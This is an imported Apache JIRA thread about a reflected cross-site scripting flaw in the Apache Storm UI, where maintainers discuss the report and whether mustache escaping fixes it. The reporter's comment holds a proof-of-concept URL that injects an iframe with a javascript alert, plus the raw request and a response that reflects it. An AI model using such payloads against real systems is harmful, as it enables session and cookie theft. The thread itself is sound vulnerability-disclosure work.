### ISSUE TITLE
[STORM-408] Cross-Site Scripting security vulnerability

### ISSUE THREAD

**Issue by jira-importer** [apache/infrastructure-jira-issues-import-test#643]
<p>There are Cross-Site Scripting security vulnerabilities in Apache Storm.</p>

<p>The risk is that it is possible to steal or manipulate customer session and cookies, which might be used to impersonate a legitimate user, allowing the hacker to view or alter user records, and to perform transactions as that user.</p>

<p>The reason is that sanitation of hazardous characters was not performed correctly on user input.</p>

---
<details><summary><i>Originally reported by <a title="Anand Krishnan" href="https://issues.apache.org/jira/secure/ViewProfile.jspa?name=akrishnan4doittnyc">akrishnan4doittnyc</a>, imported from: <a href="https://issues.apache.org/jira/browse/STORM-408" target="_blank">Cross-Site Scripting security vulnerability</a></i></summary>
<i><ul>
<li><b>status</b>: Resolved
<li><b>priority</b>: Major
<li><b>resolution</b>: Fixed
<li><b>resolved</b>: 2016-09-13T21:18:28+01:00
<li><b>imported</b>: 2025-01-17
</ul></i>
</details>

**Comment by jira-importer** [comment]
<i><a href="https://issues.apache.org/jira/secure/ViewProfile.jspa?name=revans2">revans2</a>:</i>
<p>Could you give some more details on this?  If you don't feel comfortable disclosing details here please send those details to the PPMC private@storm.incubator.apache.org</p>

**Comment by jira-importer** [comment]
<i><a href="https://issues.apache.org/jira/secure/ViewProfile.jspa?name=akrishnan4doittnyc">akrishnan4doittnyc</a>:</i>
<p>These Cross-site Scripting security vulnerabilities are manifest in the Storm UI specifically. They were discovered using a commercial security tool that injects various attack vectors into the HTTP request and analyzes the response.</p>

<p>For example, changing the following HTTP GET request URL: (*NOTE: actual server name was changed to <em>server_name</em> )</p>

<p><tt><a href="http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332" class="external-link" target="_blank" rel="nofollow noopener">http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332</a></tt></p>

<p>by changing the end of parameter: <tt>1402681332</tt> <br/>
to: <tt>1402681332%3Ciframe%20src=javascript:alert(1342)%20</tt></p>

<p><tt><a href="http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20" class="external-link" target="_blank" rel="nofollow noopener">http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20</a></tt></p>

<p><em>Test HTTP Request and Response:</em></p>

<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
<pre class="code-java">GET /topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http:<span class="code-comment">//server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332
</span>Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Connection: Keep-Alive
DNT: 1
Host: server_name:8080
Cookie: sys=<span class="code-keyword">true</span>
</pre>
</div></div>

<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
<pre class="code-java">HTTP/1.1 500 Internal Server Error
Date: Wed, 18 Jun 2014 19:37:01 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3183
Server: Jetty(6.1.26)
<!DOCTYPE html PUBLIC <span class="code-quote">"-<span class="code-comment">//W3C//DTD HTML 4.01//EN"</span> <span class="code-quote">"http://www.w3.org/TR/html4/strict.dtd"</span>>
</span><html><head><title>Storm UI</title><link href=<span class="code-quote">"/css/bootstrap-1.1.0.css"</span> rel=<span class="code-quote">"stylesheet"</span>
type=<span class="code-quote">"text/css"</span>><link href=<span class="code-quote">"/css/style.css"</span> rel=<span class="code-quote">"stylesheet"</span> type=<span class="code-quote">"text/css"</span>><script
src=<span class="code-quote">"/js/jquery-1.6.2.min.js"</span> type=<span class="code-quote">"text/javascript"</span>></script><script
src=<span class="code-quote">"/js/jquery.tablesorter.min.js"</span> type=<span class="code-quote">"text/javascript"</span>></script><script
src=<span class="code-quote">"/js/jquery.cookies.2.2.0.min.js"</span> type=<span class="code-quote">"text/javascript"</span>></script><script src=<span class="code-quote">"/js/script.js"</span>
type=<span class="code-quote">"text/javascript"</span>></script></head><body><h1><a href=<span class="code-quote">"/"</span>>Storm UI</a></h1><h2>Internal Server
Error</h2><pre>NotAliveException(msg:PROCESS_STATUS_TOPOLOGY-3-1402681332<iframe
src=javascript:alert(1342) )
at backtype.storm.generated.Nimbus$getTopologyInfo_result.read(Nimbus.java:11330)
at org.apache.thrift7.TServiceClient.receiveBase(TServiceClient.java:78)
at backtype.storm.generated.Nimbus$Client.recv_getTopologyInfo(Nimbus.java:474)
at backtype.storm.generated.Nimbus$Client.getTopologyInfo(Nimbus.java:461)
at backtype.storm.ui.core$topology_page.invoke(core.clj:481)
at backtype.storm.ui.core$fn__7877.invoke(core.clj:745)
at compojure.core$make_route$fn__3855.invoke(core.clj:93)
at compojure.core$if_route$fn__3843.invoke(core.clj:39)
at compojure.core$if_method$fn__3836.invoke(core.clj:24)
at compojure.core$routing$fn__3861.invoke(core.clj:106)
at clojure.core$some.invoke(core.clj:2390)
at compojure.core$routing.doInvoke(core.clj:106)
at clojure.lang.RestFn.applyTo(RestFn.java:139)
at clojure.core$apply.invoke(core.clj:603)
at compojure.core$routes$fn__3865.invoke(core.clj:111)
at ring.middleware.reload$wrap_reload$fn__7170.invoke(reload.clj:14)
at backtype.storm.ui.core$catch_errors$fn__7912.invoke(core.clj:798)
at
ring.middleware.keyword_params$wrap_keyword_params$fn__4391.invoke(keyword_params.clj:27)
at ring.middleware.nested_params$wrap_nested_params$fn__4428.invoke(nested_params.clj:65)
at ring.middleware.params$wrap_params$fn__4365.invoke(params.clj:55)
at
ring.middleware.multipart_params$wrap_multipart_params$fn__4454.invoke(multipart_params.clj:103)
at ring.middleware.flash$wrap_flash$fn__4729.invoke(flash.clj:14)
at ring.middleware.session$wrap_session$fn__4720.invoke(session.clj:43)
at ring.middleware.cookies$wrap_cookies$fn__4657.invoke(cookies.clj:160)
at ring.adapter.jetty$proxy_handler$fn__4204.invoke(jetty.clj:16)
at ring.adapter.jetty.proxy$org.mortbay.jetty.handler.AbstractHandler$0.handle(Unknown
Source)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at
org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:928)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:549)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
</pre></body></html>
</pre>
</div></div>

<p>The test result seems to indicate a vulnerability because the commercial security tool successfully embedded a script in the response, which will be executed when the page loads in the user's browser.</p>

<p>Let me know if this is the type of detail you were interested in.</p>

**Comment by jira-importer** [comment]
<i><a href="https://issues.apache.org/jira/secure/ViewProfile.jspa?name=parth.brahmbhatt">parth.brahmbhatt</a>:</i>
<p>According to <a href="https://github.com/janl/mustache.js/" class="external-link" target="_blank" rel="nofollow noopener">https://github.com/janl/mustache.js/</a> when we use {{ unsafe data }} the content is assumed to be unsafe and escaped by mustache. All storm mustache template uses {{ unsafe data }} so all the user entered content is treated as unsafe. I tried replicating your example and even though the script is rendered , the browser indeed does not run the alert as it is already escaped. If I change the template from unsafe {{ unsafe data }} to safe {{</p>
{ safe data }
<p>}} tag then the alert pops up. </p>

<p>Let me know if you still think storm ui has this vulnerability. Otherwise , please confirm here that the vulnerability does not exist so someone can resolve this JIRA.</p>

**Comment by jira-importer** [comment]
<i><a href="https://issues.apache.org/jira/secure/ViewProfile.jspa?name=akrishnan4doittnyc">akrishnan4doittnyc</a>:</i>
<p>We are seeing the problem exists in the Firefox browser, but appears to be suppressed in the Chrome browser.</p>

<p>Additionally, we are currently using Storm version 0.9.0.1 which does not use the mustache.js templates. We will explore upgrading to solve this problem. Thanks.</p>

**Comment by jira-importer** [comment]
<i><a href="https://issues.apache.org/jira/secure/ViewProfile.jspa?name=parth.brahmbhatt">parth.brahmbhatt</a>:</i>
<p>I tried the same thing in firefox 24.0 , same result. I think upgrading to the newest version should fix the issue for you. Not sure what's the policy on fixing bugs/security vulnerabilities on older versions. </p>
